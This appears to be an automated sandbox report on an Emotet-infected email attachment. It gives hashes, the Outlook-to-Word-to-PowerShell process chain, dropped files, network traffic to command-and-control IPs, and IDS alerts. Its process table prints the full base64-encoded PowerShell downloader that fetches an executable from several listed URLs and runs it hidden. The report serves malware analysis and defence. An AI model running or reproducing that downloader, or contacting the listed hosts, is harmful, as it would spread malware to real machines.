File name: | RE Re Mondiv - Mac Grill pasta sauce (1).eml |
Full analysis: | https://app.any.run/tasks/ad7520c5-c3a9-4c79-b966-1a2b71edef54 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 10:23:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | message/rfc822 |
File info: | RFC 822 mail, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 37C0AF8A8380FF52F9FFC234FFC89B67 |
SHA1: | 01A84F45A60EC4256B3C37ACEDC9FCE52180C2A8 |
SHA256: | 28388D0F7AB4A49E90C19177E15F260D02337DBAB61E4710DE665E88305668C8 |
SSDEEP: | 3072:qquVryJ0guPVtHuK/ASOKFBxQ4C2y7jD1uJNb61RMwHy5S7R:MSuPVNuK/POKfxRKK2RMwjF |
.eml | | | E-Mail message (Var. 5) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3388 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\RE Re Mondiv - Mac Grill pasta sauce (1).eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3WIOMPLF\MAY2019_UGT93019294_Z.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3472 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
936 | powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABFADkAMwA2ADIAMABfAD0AJwBPADMANQAwADAAMAA5ADcAJwA7ACQATAAzADQAMwAzAF8AOQAgAD0AIAAnADgAMwA0ACcAOwAkAFkAXwA4ADYAOQAxADYANQA9ACcATwAxADcAOAA0ADEAMQAnADsAJAByADEANwAyADAAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATAAzADQAMwAzAF8AOQArACcALgBlAHgAZQAnADsAJABKADgAMQAwAF8AMgAxADQAPQAnAFoAOAAyADAAMgAyADIAJwA7ACQARgAzADMAOAAxADgAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBgAFQALgBgAHcAZQBiAGMAbABpAGUAbgBUADsAJABmADcAMAAwADAAMwA0ADkAPQAnAGgAdAB0AHAAOgAvAC8AaABwAGEAdQBkAGkAbwBiAG8AbwBrAHMAZgByAGUAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBuAHMANgAzADEALwBAAGgAdAB0AHAAOgAvAC8AYQBsAGQAbwBjAG8AbgB0AHIAZQByAGEAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaABxAHcANwA2AHkAMQA0AC8AQABoAHQAdABwAHMAOgAvAC8AaQByAGkAcwBtAGEAbAAuAGMAbwBtAC8AdAB1AHQAbwByAGkAYQBsAC8AYQBkAGQAbgBlAHcAcwAvAGMAcwBzAC8AMgA1ADMAMAAxAC8AQABoAHQAdABwADoALwAvAGkAcgBiAGYALgBjAG8AbQAvAGIAYQB5AHQAZQBzAHQAMgAvADMAegBmADEAYgBhADcANQA2ADkALwBAAGgAdAB0AHAAOgAvAC8AaABhAG4AYQBiAGkAcwBoAGkALgBuAGUAdAAvAHIAaQBrAGsAeQBvAC8AawB3ADcALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAbAAxADQANwA5ADcAMQAyAD0AJwBpADAAOQBfADIAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAaAAzADkAOAA0ADUAOQAgAGkAbgAgACQAZgA3ADAAMAAwADMANAA5ACkAewB0AHIAeQB7ACQARgAzADMAOAAxADgALgBEAE8AdwBuAGwAbwBhAGQAZgBJAGwAZQAoACQAaAAzADkAOAA0ADUAOQAsACAAJAByADEANwAyADAAMwApADsAJABIADkANQA4ADkAMgBfAD0AJwBJADMANQA2ADMAXwAzADAAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdABlAG0AJwApACAAJAByADEANwAyADAAMwApAC4AbABFAG4ARwB0AGgAIAAtAGcAZQAgADMAMgAwADkANQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJAByADEANwAyADAAMwA7ACQATAAzAF8AXwAyADIAPQAnAG0AOABfADIAMAA4AF8AJwA7AGIAcgBlAGEAawA7ACQAQgA0ADMANwBfAF8AMAA9ACcAaAA1ADAANgAyADYAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2ADAANQA3ADcANAA9ACcAQgAzADEANwAwADMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2984 | "C:\Users\admin\834.exe" | C:\Users\admin\834.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3808 | --acf80377 | C:\Users\admin\834.exe | 834.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1484 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 834.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3068 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\tmp1016.tmp | — | |
MD5:— | SHA256:— | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF95B182B88D219630.TMP | — | |
MD5:— | SHA256:— | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3WIOMPLF\MAY2019_UGT93019294_Z (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR260E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2924E894-A154-46BF-9ED0-15A9F229AFA9.0\13196998.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:7A2ED665A8D38B7DD175A67278644211 | SHA256:3A4B55427EFE51F04323DF8C6801106849FF3CFA002260A29A501D871A5BC996 | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2924E894-A154-46BF-9ED0-15A9F229AFA9.0\13196998.doc | document | |
MD5:2FB8D9CB203E0F98B8E12240B84D96A2 | SHA256:E5BF1F965EE66A7B0974972CA92977E8534AFEDCD839B9D8AB131EE10A9E4F17 | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3WIOMPLF\MAY2019_UGT93019294_Z.doc | document | |
MD5:2FB8D9CB203E0F98B8E12240B84D96A2 | SHA256:E5BF1F965EE66A7B0974972CA92977E8534AFEDCD839B9D8AB131EE10A9E4F17 | |||
3388 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{D720B3DB-5A29-48DB-8C51-D5D61C6C5C2A}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.png | image | |
MD5:7D80C0A7E3849818695EAF4989186A3C | SHA256:72DC527D78A8E99331409803811CC2D287E812C008A1C869A6AEA69D7A44B597 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3388 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
936 | powershell.exe | GET | 200 | 185.80.129.130:80 | http://hpaudiobooksfree.com/wp-admin/6ns631/ | LT | executable | 74.0 Kb | suspicious |
3068 | soundser.exe | POST | — | 81.143.213.156:7080 | http://81.143.213.156:7080/balloon/nsip/ | GB | — | — | malicious |
3068 | soundser.exe | POST | — | 80.0.106.83:80 | http://80.0.106.83/acquire/ | GB | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3388 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
3068 | soundser.exe | 80.0.106.83:80 | — | Virgin Media Limited | GB | malicious |
936 | powershell.exe | 185.80.129.130:80 | hpaudiobooksfree.com | UAB Esnet | LT | suspicious |
3068 | soundser.exe | 81.143.213.156:7080 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
hpaudiobooksfree.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
936 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
936 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
936 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3068 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |